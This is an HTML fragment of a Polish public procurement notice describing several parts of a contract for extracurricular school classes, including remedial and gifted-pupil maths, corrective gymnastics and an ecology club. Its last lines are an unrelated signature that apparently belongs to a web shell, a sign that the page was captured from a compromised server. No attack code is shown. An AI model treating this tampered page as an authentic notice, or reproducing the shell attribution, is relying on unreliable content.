<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem zajęć jest wyrównywanie braków w wiadomościach i umiejętnościach matematycznych uczniów, dla których te braki są przyczyną niepowodzeń szkolnych. Specyfika zajęć oraz ich atrakcyjność (np. nauka przez zabawę) mają umożliwić niwelowanie trudności, trenować umiejętność skupienia się na zadaniu, zwiększać motywację do pokonywania trudności. Ryzyko porażki na lekcji w klasie staje się (główny cel zajęć) znacznie mniejsze. Zajęcia muszą przewidywać: indywidualizację, stopniowanie trudności, rozwijanie zainteresowań, różnorodność wykonywanych zadań, wyzwalanie twórczej aktywności pozwoli uczniom lepiej funkcjonować w zespołach klasowych. Istotna jest znajomość zakwalifikowanych uczestników i bardzo dokładne zdiagnozowanie ich braków edukacyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia z gimnastyki korekcyjnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Efektem zajęć ma być nabycie przez uczestników nawyku prawidłowej postawy ciała oraz świadomość istotnej roli prawidłowej postawy dla zdrowia i rozwoju. Program zajęć powinien być dostosowany do korygowania wad postawy u dzieci i młodzieży. Powinien zawierać również instruktaż ćwiczeń domowych, dobór ćwiczeń do indywidualnych potrzeb ćwiczących, zgodnie ze wskazaniami lekarskimi wynikającymi z istniejącej wady postawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia korekcyjno - kompensacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia przeznaczone są dla uczniów ze specyficznymi trudnościami w uczeniu się i zachowaniu. Celem zajęć jest praca nad relacjami uczniów w grupie rówieśniczej oraz relacjami w kontaktach uczeń- nauczyciel. Zajęcia korekcyjno- kompensacyjne wymagają gruntownej znajomości środowiska domowego uczniów, współpracy 
z rodzicami, opiekunami dzieci oraz znajomości trudności dziecka, indywidualizacji pracy przy jednoczesnym wdrażaniu w umiejętności pracy w zespole klasowym. Korygowanie zachowań oraz niwelowanie trudności w uczeniu
się ma pozwolić uczestnikom na osiąganie sukcesów na miarę swoich możliwości w zespole klasowym.
Ze względu na specyfikę zajęć prowadzący muszą legitymować się wykształceniem wyższym pedagogicznym, doświadczeniem w zakresie kształcenia umiejętności społecznych najmłodszych, posiadać kwalifikacje w zakresie rewalidacji lub oligofrenopedagogiki lub terapii pedagogicznej. Niezbędna jest znajomość środowiska uczniów zakwalifikowanych na zajęcia, gruntowna diagnoza trudności oraz dobór odpowiednich metod terapeutycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zajęcia w ramach kółka przyrodniczo- ekologicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem tych zajęć jest skuteczne i efektywne kształtowanie postaw dzieci zgodnych z edukacją ekologiczną. Program zajęć powinien  służyć  pogłębianiu i poznawaniu nowej wiedzy, pobudzaniu aktywności dzieci, twórczemu myśleniu. Uczyć współdziałania w zespole, kształtować właściwe postawy. Pomagać dzieciom w ciekawy i pożyteczny sposób spędzać wolny czas. Rozwijać zainteresowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zajęcia humanistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ogólnych założeniach praca z uczniem zdolnym humanistycznie ma na celu rozwijanie jego zdolności
i zainteresowań. Są to działania nastawione na pobudzanie aktywności uczniów, wyobraźni, fantazji, motywowanie uczniów do wykorzystania swoich uzdolnień do dalszej pracy, przyzwyczajanie uczniów do samodzielnego rozwiązywania problemów, z wykorzystaniem posiadanej wiedzy, doskonalenie koncentracji uwagi, kształcenie pomysłowości, krytycyzmu, rozbudzanie ciekawości poznawczej, twórczego działania i samodzielności, przygotowanie uczniów do konkursów. Ww. cele umożliwiają dzieciom wyzwolenie aktywności twórczej, gromadzenie doświadczeń i przeżyć estetycznych, artystycznych i społecznych. Rozwijają wyobraźnię dziecka i jego kreatywność. Wpływają na rozwój jego osobowości, umożliwiają wypowiedź w różnych rodzajach ekspresji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zajęcia matematyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ogólnych założeniach praca z uczniem zdolnym matematycznie ma na celu rozwijanie jego zdolności 
i zainteresowań. Są to działania nastawione na pobudzanie aktywności umysłowej uczniów, wyobraźni, motywowanie uczniów do wykorzystania swoich uzdolnień do dalszej pracy, przyzwyczajanie uczniów do samodzielnego rozwiązywania problemów, z wykorzystaniem posiadanej wiedzy, doskonalenie koncentracji uwagi, kształcenie pomysłowości, krytycyzmu, szybkości podejmowania decyzji, rozbudzanie ciekawości poznawczej, twórczego działania i samodzielności, przygotowanie uczniów do konkursów. Ww. cele umożliwiają dzieciom wyzwolenie aktywności twórczej. Rozwijają wyobraźnię dziecka i jego kreatywność. Wpływają na rozwój jego osobowości..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com